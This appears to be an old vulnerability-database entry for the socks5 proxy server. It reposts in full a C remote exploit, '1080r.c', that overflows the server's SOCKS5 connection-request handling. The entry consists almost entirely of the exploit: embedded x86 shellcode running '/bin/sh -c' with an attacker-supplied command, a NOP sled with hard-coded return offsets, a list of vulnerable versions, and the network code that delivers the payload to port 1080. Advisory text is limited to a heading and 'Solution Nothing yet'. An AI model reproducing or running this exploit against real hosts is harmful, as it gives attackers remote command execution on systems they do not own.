|
Vulnerability socks5 Affected socks5 Description '0days master' posted following. /* * !!!! Private do not distribute !!!! * * <1080r.c> socks5 remote exploit / linux x86 * * Usage: * $ ./1080r <host> <command> [offset] * * Vulnerables: * socks5-v1.0r10 (compiled on a turbolinux 4.0.5) => 0 * socks5-v1.0r9 (compiled on a turbolinux 4.0.5) => 0 * socks5-v1.0r8 (compiled on a turbolinux 4.0.5) => 0 * socks5-v1.0r10 (compiled on a redhat 6.0) => 400 * socks5-s5watch-1.0r9-2 (redhat-contrib) => no? * socks5-0.17-1 (redhat 4.2) => no * socks5-1.0r10-5 (redhat-contrib) => no?? * socks5-server-1.0r6-8TL (TurboContrib) => no?? * * By: The Dark Raver of CPNE (Spain - 9/5/2000) * * <http://members.tripod.com/~ochodedos> - <doble@iname.com> * * "Pasaba arrolladora en su hermosura * y el paso le dejé, * ni aun mirarla me volví, y no obstante * algo en mi oído murmuró, esa es..." * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <signal.h> #include <unistd.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netdb.h> #include <arpa/inet.h> #include <arpa/nameser.h> #define NOP 0x90 #define MAXLEN 2000 #define OFFSET 0x7fffd99d // TurboLinux 4.0.5 #define ALIGN 3 #define LENGTH 195 char hell[100]= "\xeb\x29" // jmp 0x13 "\x5e" // popl %esi "\x89\x76\x30" // movl %esi,0x30(%esi) "\x89\xf0" // movl %esi,%eax "\x83\xc0\x08" // addl $0x8,%eax "\x89\x46\x34" // movl %eax,0x34(%esi) "\x83\xc0\x03" // addl $0x3,%eax "\x89\x46\x38" // movl %eax,0x38(%esi) "\x31\xc0" // xorl %eax,%eax "\x89\x46\x3c" // movl %eax,0x3c(%esi) "\x88\x46\x07" // movb %eax,0x7(%esi) "\x88\x46\x0a" // movb %eax,0xa(%esi) "\xb0\x0b" // movb $0xb,%al "\x89\xf3" // movl %esi,%ebx "\x8d\x4e\x30" // leal 0x30(%esi),%ecx "\x8d\x56\x3c" // leal 0x3c(%esi),%edx "\xcd\x80" // int $0x80 "\xe8\xd2\xff\xff\xff" // call -0x22 "/bin/shA" "-cA" ""; char buf[MAXLEN]; main(int argc, char *argv[]) { struct sockaddr_in to; char buff[1000]; int sd; int pktlen; struct hostent *hp; int i; long *addr; int off; int alin; int len; int offset; if(argc==4) { offset=atoi(argv[3]); } else { if(argc==3) { offset=0; } else { printf("Uso: ./1080r <host> <command> [offset]\n"); exit(0); } } len=LENGTH; off=OFFSET+offset; alin=ALIGN; strcat(hell,argv[2]); strcat(hell,";"); memset(buf,NOP,len); memcpy(buf+len-strlen(hell)-4,hell,strlen(hell)); addr=(long *)(buf+alin); for (i=0;i<46;i+=4) *(addr++) = off; buf[len-1]='\0'; to.sin_family=AF_INET; to.sin_port = htons(1080); if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) { perror("gethostbyname()"); exit(0); } if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("socket()"); exit(0); } memcpy((char *)&to.sin_addr,(char *)hp->h_addr,hp->h_length); if(connect(sd,(struct sockaddr *)&to,sizeof(to))!=0) { perror("connect()"); exit(0); } printf("Connect: Ready to send overflow...\n"); //getchar(); // inicio pktlen=3; buff[0]=0x5; // SOCKS version 5 buff[1]=0x1; // one authentication type... buff[2]=0x0; // no authentication //buff[2]=0x2; // userpass if(write(sd, buff, pktlen)!=pktlen) { perror("write error"); exit(-1); } if(read(sd, buff, 2)!=2) { perror("read error"); exit(-1); } if(buff[0] != 0x5) { printf("invalid response\n"); exit(-1); } if(buff[1] == 0xf) { printf("proxy requires authenticationn"); exit(-1); } if(buff[1] != 0x0) { printf("proxy returned an invalid authentication type\n"); exit(-1); } // autentificacion /* printf("done\n"); printf("sending autentificacion request..."); pktlen=snprintf(buff, sizeof(buff), "\x01%c%s%c%s", strlen(username), username, strlen(password), password); send(sd, buff, pktlen, 0); recv(sd, buff, 2, 0); if(buff[1] != 0x00) { printf("username/password invalid\n"); exit (1); } */ // conexion for(i=1;i<=len;i++) putchar(buf[i]); printf("done\n"); printf("sending connection request..."); pktlen=snprintf(buff, sizeof(buff), "\x05\x01%c\x03%c%s%c%c", 0x00, strlen(buf), buf, 0x11, 0x22); if(write(sd, buff, pktlen)!=pktlen) { perror("write error"); exit(-1); } if(read(sd, buff, 4)!=4) { perror("read error (1)"); exit(-1); } switch(buff[1]) { case 0: printf("succeeded\n"); break; case 1: printf("general SOCKS server failure\n"); exit(-1); case 2: printf("connection not allowed by ruleset\n"); exit(-1); case 3: printf("network unreachable\n"); exit(-1); case 4: printf("host unreachable\n"); exit(-1); case 5: printf("connection refused\n"); exit(-1); case 6: printf("TTL expired\n"); exit(-1); case 7: printf("command not supported (?)\n"); exit(-1); case 8: printf("address type not supported\n"); exit(-1); default: printf("returned unknown error code\n"); exit(-1); } } Solution Nothing yet.